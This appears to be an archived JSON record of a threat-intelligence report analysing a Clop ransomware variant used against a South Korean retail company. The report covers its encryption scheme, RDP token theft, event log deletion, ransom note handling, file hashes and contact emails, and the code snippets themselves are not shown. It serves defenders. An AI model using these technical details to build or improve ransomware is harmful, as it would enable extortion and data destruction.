{
	"id": "5aeb702f-a4bc-4998-a876-58d148f0f16e",
	"created_at": "2026-04-06T00:11:06.894735Z",
	"updated_at": "2026-04-10T03:20:30.666037Z",
	"deleted_at": null,
	"sha1_hash": "05c5d45f5494dadcbdb1827a68e99ea05205b799",
	"title": "[S2W LAB] Analysis of Clop Ransomware suspiciously related to the Recent Incident (English)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2752428,
	"plain_text": "[S2W LAB] Analysis of Clop Ransomware suspiciously related to\r\nthe Recent Incident (English)\r\nArchived: 2026-04-05 18:44:14 UTC\r\nAuthor: TALON (BLKSMTH, HOTSAUCE)\r\nThe ransomware Clop has hit the network of conglomerate and retail giant in South Korea which suspended\r\nnearly half of stores due to its attack. We have analyzed the ransomware related to the incident and the summary\r\nof the analysis can be seen below.\r\nA new variant of the Clop ransomware seems to generate separate key files and store encryption keys for each\r\nencrypted files as opposed to the previous behavior of changing the file content and extension and saving the\r\nencryption key at the final stage\r\nKey File Extension : .cllp\r\nKey File Header : Cllp^_-\r\nRansom Note: We have identified that the contact email used in ransom note is identical to the email used by Clop\r\nRansomware on the Dark Web where they leak corporate data when negotiations fails.\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 1 of 12\n\nWe have also detected the same variant of the ransomware that contained identical signatures on Virus Total\r\n(Build time: Nov-21-2020).\r\nWe have yet finalized the deploying patterns but we can assume the intrusion technique by referring to previous\r\nincidents.\r\nNetwork intrusion using SMB exploit.\r\nA massive deployment by compromised administrator account of an Active Directory.\r\nMalicious document files distributed as attachments via spear phishing emails.\r\nMD5 : 8b6c413e2539823ef8f8b85900d19724 SHA-1 : 2d92a9ec1091cb801ff86403374594c74210cd44\r\nSHA-256 : 3d94c4a92382c5c45062d8ea0517be4011be8ba42e9c9a614a99327d0ebdf05b Type : Win32\r\nEXE (PE32 executable for MS Windows (GUI) Intel 80386 32-bit) Build Time : 2020-11-20 18:18:18\r\nIt is configured to be executed by allocating to the memory (VirtualAlloc) so that the structure of the malicious\r\ncode cannot be understood.\r\nSelf-deletion is executed after generating ex.bat file\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 2 of 12\n\nMD5 : 14B7069B25B04EBA875F264BE4F140DA\r\nBuild Time : 2020-11-20 14:35:08\r\nRun and register itself as a service\r\nService name : WinCheckDRVs\r\nUses mutex to check if another instance is running (duplication check)\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 3 of 12\n\nMutex name : GKLJHWRnjktn32uyhrjn23io#666\r\nTours around remote shared folders and attempts to encrypt\r\nGets token of 'EXPLORER.EXE'\r\nCollects primary access token of user is logged on to the active RDP session\r\nCollects RDP session token of the same account as the username of the collected EXPLORER.EXE token\r\nCollects token of active session if username is 5 or less\r\nExecutes itself on winsta0\\default with \"runrun\" as a parameter\r\nTours around remote shared folders and attempts to encrypt\r\nRun event log deletion command\r\n\u003e Loading PowerShell code…\r\nAttempts to encrypt the entire drive from A to Z except Floppy Disk, CD-ROM.\r\nThe new version of the clop ransomware attempts to encrypt files in use by forcing an application or service to\r\nrestart using the Restart Manager API.\r\nRSA Public Key hard coded inside the malware.\r\n\u003e Loading Plain Text code…\r\nSkips Desktop path when encrypting files\r\nAvoids certain files by matching hash value of file name\r\nClop passes encrypting certain file extensions:\r\n.CI0P : Previously encrypted file extension\r\n.OCX : Object linking and embedding files (ActiveX)\r\n.DLL : Compiled library (dynamic)\r\n.INI : Initialization file\r\n.CHM : Compiled HTML help file\r\n.LNG : Language pack file\r\n.CLLP : Current encrypted ransomware file\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 4 of 12\n\nEncryption technique varies depending on the size of target files\r\nsizeof(TargetFile) \u003c 17KB : Passes encryption\r\n1.7KB \u003c sizeof(TargetFile) \u003c 2.13MB : Encrypts from 0x4000 to EOF(End of File)\r\nUses general file input/output method\r\n2.13MB \u003c sizeof(TargetFile) : 0x10000~0x2089D0 Encryption\r\nMMF method is used to handle large size files efficiently.\r\nMMF : Through the Memory Mapped File(MMF), the contents of a file in virtual memory space can be linked\r\nenabling an application to write the file directly to the memory.\r\nA diagram of encryption method by Clop ransomware\r\nCreates a 117byte long key by randomly referencing the 256byte table below (Mersenne Twister algorithm is used\r\nwhen generating the random number)\r\n\u003e Loading Plain Text code…\r\n117byte default key is used when creation fails\r\n\u003e Loading Plain Text code…\r\n117byte key is used as RC4 algorithm key to encrypt the original data, then updates\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 5 of 12\n\nIt overwrites the encrypted data rather than deleting the original file\r\nKey storage file [encryption target file name].cllp is created to manage encryption keys per file\r\nKey File Header : Cllp^_- -\u003e 7byte\r\nKey File Data : 117byte RC4 Key encrypted by RSA public Key → 128byte\r\nTours around shared folders and attempts to encrypt\r\nIdentical encrypting schemes is used to encrypt afterwards\r\nAttempts to encrypt files from the C Drive\r\nRansom note created in every encrypted file\r\nRansom note file name : README_README.txt\r\nRansom note created by following procedure\r\nExtract encoded data in resource section inside malicious code\r\nResource ID : 39339, Resource NAME : ID_HTML\r\nExtract the original data by XOR decoding the resource data and the table below\r\n\u003e Loading Plain Text code…\r\nDo not delete the shadow volume unlike before\r\nWhen Command line parameter = temp.dat\r\nReads temp.dat upon execution and attempts to only encrypt the path that has been specified\r\nFunction exists, however is the option that is not executed from the actual code\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 6 of 12\n\ndinoriuss1973@tutanota[.]com unlock@support-box[.]com unlock@support-iron[.]com\r\nContact (E-mail addresses) information is identical with the information from the Darkweb website that list-up the\r\nClop ransomware victims (Leaks Website*).\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 7 of 12\n\nNumber of Clop Ransomware Victims on the Darkweb: 17\r\nData uploading cycle for negotiated firm: Approximately 7 days – 1 month\r\nAccounting related information\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 8 of 12\n\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 9 of 12\n\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 10 of 12\n\n\u003e Loading Plain Text code…\r\nof other malware similar to recent sample\r\n11 different malware code MD5 lists that share identical signature information\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 11 of 12\n\nMD5 : 8fc09cb1540a6dea87a078b92c8f2b0a SHA-1 : 16f48624ea2a575e1bdceb4ac6151d97d4de80b6\r\nSHA-256 : 389e03b1a1fd1c527d48df74d3c26a0483a5b105f36841193172f1ee80e62c1b Build Time\r\n2020-11-21 15:56:31\r\nConfirmed that Malware code has been created more recently than #01 Clop Ransomware\r\n(8b6c413e2539823ef8f8b85900d19724)\r\nIdentical method to import the malware activity file with #01 Clop\r\nRansomware(8b6c413e2539823ef8f8b85900d19724)\r\nMD5 : AC0FE3E86F9FC7E5FD08D9E618B601F3 SHA1 :\r\n8C7173BDDE2919B524B22EA257A80360DF33A333 SHA256 :\r\n71DB30A0174795E9387F6A6CCA940359028CAD3BC3B7BEF24B48E150102DB391 Build TIme\r\n2020-11-21 14:43:58\r\nSource: https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf0124\r\n2409a6e9f844f0c5f2e\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e"
	],
	"report_names": [
		"S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e"
	],
	"threat_actors": [],
	"ts_created_at": 1775434266,
	"ts_updated_at": 1775791230,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/05c5d45f5494dadcbdb1827a68e99ea05205b799.pdf",
		"text": "https://archive.orkl.eu/05c5d45f5494dadcbdb1827a68e99ea05205b799.txt",
		"img": "https://archive.orkl.eu/05c5d45f5494dadcbdb1827a68e99ea05205b799.jpg"
	}
}